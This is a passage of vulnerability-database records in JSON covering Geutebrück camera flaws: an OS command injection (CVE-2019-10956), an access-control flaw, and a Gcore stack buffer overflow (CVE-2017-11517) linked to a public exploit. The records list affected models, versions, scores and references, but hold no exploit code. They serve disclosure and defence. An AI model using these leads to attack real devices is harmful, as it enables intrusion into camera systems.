          }
        },
        "data": "Geutebruck IP Cameras Incorrect access control vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-1487

    Vulnerability from variot - Updated: 2024-11-23 21:51

    Geutebruck IP Cameras G-Code (EEC-2xxx), G-Cam (EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated user, using a specially crafted URL command, to execute commands as root. Geutebruck IP Camera G-Code and G-Cam contain an OS command injection vulnerability. Information may be acquired or falsified, and a denial-of-service (DoS) condition may result. G-Cam is a web camera series launched by Geutebrück. G-Code is an analog video encoder launched by Geutebrück.

    Geutebrück G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability arises because operating system commands are constructed from external input data, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. The following products of Geutebruck are affected: G-Code EEC-2xxx version 1.12.0.25 and prior; G-Cam EBC-21xx version 1.12.0.25 and prior; G-Cam EFD-22xx version 1.12.0.25 and prior; G-Cam ETHC-22xx version 1.12.0.25 and prior; G-Cam EWPC-22xx version 1.12.0.25 and prior.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1487",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-2110",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-2111",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2240",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2241",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-2230",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-2239",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-2240",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-2249",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code/eec-2400",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ebc-2110_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ebc-2111_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_efd-2240_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_efd-2241_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2230_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2239_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2240_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2249_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-code_eec-2400_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Romain Luyer and Guillaume Gronnier from CEIS, and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-10956",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2019-10956",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2020-22346",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2019-10956",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-10956",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-10956",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-10956",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-22346",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-088",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-10956",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated user, using a specially crafted URL command, to execute commands as root. An OS command injection vulnerability exists in Geutebruck IP Camera G-Code and G-Cam. Information may be obtained or tampered with, and a denial-of-service (DoS) condition may result. G-Cam is a web camera series launched by Geutebr\u00fcck. G-Code is an analog video encoder launched by Geutebr\u00fcck. \n\r\n\r\nGeutebr\u00fcck G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input data constructs executable commands for the operating system, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. \nThe following products of Geutebruck are affected:\nG-Code EEC-2xxx version 1.12.0.25 and prior\nG-Cam EBC-21xx version 1.12.0.25 and prior\nG-Cam EFD-22xx version 1.12.0.25 and prior\nG-Cam ETHC-22xx version 1.12.0.25 and prior\nG-Cam EWPC-22xx version 1.12.0.25 and prior",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "ICS CERT",
            "id": "ICSA-19-155-03",
            "trust": 3.4
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "108579",
            "trust": 1.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "id": "VAR-202001-1487",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          }
        ],
        "trust": 1.5020833375
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:51:41.399000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/"
          },
          {
            "title": "Patch for Geutebr\u00fcck G-Cam and G-Code OS command injection vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/213553"
          },
          {
            "title": "Multiple Geutebr\u00fcck Product Command Injection Vulnerability Fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93177"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.6,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10956"
          },
          {
            "trust": 0.9,
            "url": "https://www.geutebrueck.com/en_en.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10956"
          },
          {
            "trust": 0.7,
            "url": "https://www.securityfocus.com/bid/108579"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "date": "2020-01-17T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2020-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "date": "2019-06-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "date": "2020-01-17T18:15:12.040000",
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "date": "2020-01-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2020-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "date": "2020-01-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "date": "2024-11-21T04:20:13.833000",
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OS command injection vulnerability in Geutebruck IP Camera G-Code and G-Cam",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2017-11517 (GCVE-0-2017-11517)

    Vulnerability from nvd – Published: 2017-07-21 20:00 – Updated: 2024-09-17 01:25
    Summary
    Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    URL Tags
    https://www.exploit-db.com/exploits/41153/ exploit, x_refsource_EXPLOIT-DB

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T18:12:40.088Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "41153",
                "tags": [
                  "exploit",
                  "x_refsource_EXPLOIT-DB",
                  "x_transferred"
                ],
                "url": "https://www.exploit-db.com/exploits/41153/"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2017-07-21T20:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "name": "41153",
              "tags": [
                "exploit",
                "x_refsource_EXPLOIT-DB"
              ],
              "url": "https://www.exploit-db.com/exploits/41153/"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2017-11517",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "41153",
                  "refsource": "EXPLOIT-DB",
                  "url": "https://www.exploit-db.com/exploits/41153/"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2017-11517",
        "datePublished": "2017-07-21T20:00:00.000Z",
        "dateReserved": "2017-07-21T00:00:00.000Z",
        "dateUpdated": "2024-09-17T01:25:55.226Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-11517 (GCVE-0-2017-11517)

    Vulnerability from cvelistv5 – Published: 2017-07-21 20:00 – Updated: 2024-09-17 01:25
    Summary
    Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request.
    Severity
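    No CVSS data available. The record below carries no metrics block, so the missing score does not indicate low severity: the summary describes remote arbitrary code execution, and the only reference is tagged as an exploit.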
    CWE
    • n/a
    Assigner
    References
    URL Tags
    https://www.exploit-db.com/exploits/41153/ exploit, x_refsource_EXPLOIT-DB

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T18:12:40.088Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "41153",
                "tags": [
                  "exploit",
                  "x_refsource_EXPLOIT-DB",
                  "x_transferred"
                ],
                "url": "https://www.exploit-db.com/exploits/41153/"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
            }
          ],
